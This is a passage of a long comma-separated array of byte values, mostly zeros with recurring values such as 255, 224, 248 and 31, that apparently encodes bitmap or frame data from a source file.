0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 16, 0, 0, 128, 16, 0, 0, 128,
16, 128, 16, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 16, 0, 0, 128, 16, 0, 0,
128, 16, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 16, 0, 0, 128, 16,
0, 0, 128, 16, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 16, 128, 16,
128, 16, 128, 16, 128, 16, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
128, 16, 128, 16, 128, 16, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 128, 16, 0, 0, 128, 16, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
